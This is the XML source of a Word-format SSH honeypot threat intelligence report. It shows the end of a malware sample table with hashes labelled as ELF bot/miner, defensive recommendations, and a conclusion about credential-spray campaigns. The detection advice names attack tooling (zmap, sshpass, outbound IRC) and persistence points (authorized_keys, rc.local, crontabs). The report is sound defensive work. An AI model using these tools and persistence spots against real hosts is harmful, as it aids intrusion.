      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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048e374baac36d8cf68dd32e48313ef8eb517d647548b1bf5f26d2d0e2e3cdc7</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val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ELF bot/miner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680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b9e643a8e78d2ce745fbe73eb505c8a0cc49842803077809b2267817979d10b0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BBBBBB" w:sz="1"/>
              <w:left w:val="single" w:color="BBBBBB" w:sz="1"/>
              <w:bottom w:val="single" w:color="BBBBBB" w:sz="1"/>
              <w:right w:val="single" w:color="BBBBBB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EAF0F6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ELF bot/miner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Defensive Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every technique observed in this engagement is defeated by basic, well-established controls. The attacks succeed only against neglected or default-configured systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 Immediate Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable password authentication for SSH; permit key-based login only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Forbid direct root login (PermitRootLogin no).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Change or restrict default accounts (pi, ubuntu, admin) and eliminate default passwords on all devices, especially IoT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restrict SSH exposure with a firewall allow-list or move it behind a VPN; do not expose port 22 to the open internet unnecessarily.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 Detection &amp; Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alert on outbound IRC (TCP 6667) and on the appearance of zmap/sshpass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor authorized_keys, rc.local and crontabs for unauthorised modification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Baseline /tmp, /var/tmp and /dev/shm for unexpected executables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy a honeypot such as this one as an early-warning sensor for credential-spray campaigns hitting your address space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In fifteen days an unadvertised Debian host attracted over a third of a million malicious events from nearly nine hundred sources and was served twenty-one distinct malware samples spanning three behavioural classes. The engagement demonstrates three points clearly. First, exposure equals compromise: opportunistic attackers find and brute-force new SSH services within minutes, with no provocation. Second, the threat is automated and industrialised — uniform tooling, distributed rented infrastructure, and architecture-aware payloads delivered by script. Third, the internet's attack surface is contested territory, with malware families actively evicting one another to monopolise a single low-value VPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Critically, none of the observed attacks were sophisticated zero-days. They were commodity campaigns exploiting weak and default credentials — and every one of them is stopped by key-based authentication and the removal of default logins. The exercise reinforces that disciplined fundamentals, not exotic defences, neutralise the overwhelming majority of real-world intrusion attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-on work. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Reverse-engineering of the ten ELF binaries, longer-horizon collection to observe campaign evolution, and forwarding of sensor telemetry into a SIEM with automated enrichment and alerting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="2E5C8A" w:sz="6" w:space="8"/>
        </w:pBdr>
        <w:spacing w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">End of report — Miguel Marín Simón, 25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Threat Intelligence Report  |  SSH Honeypot  |  TLP:CLEAR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6"/>
      </w:pBdr>
      <w:spacing w:after="160" w:before="280"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A274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47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SSH Honeypot Threat Intelligence Report</dc:title>
  <dc:creator>Miguel Marin Simon</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-24T23:53:28.482Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-24T23:53:28.482Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>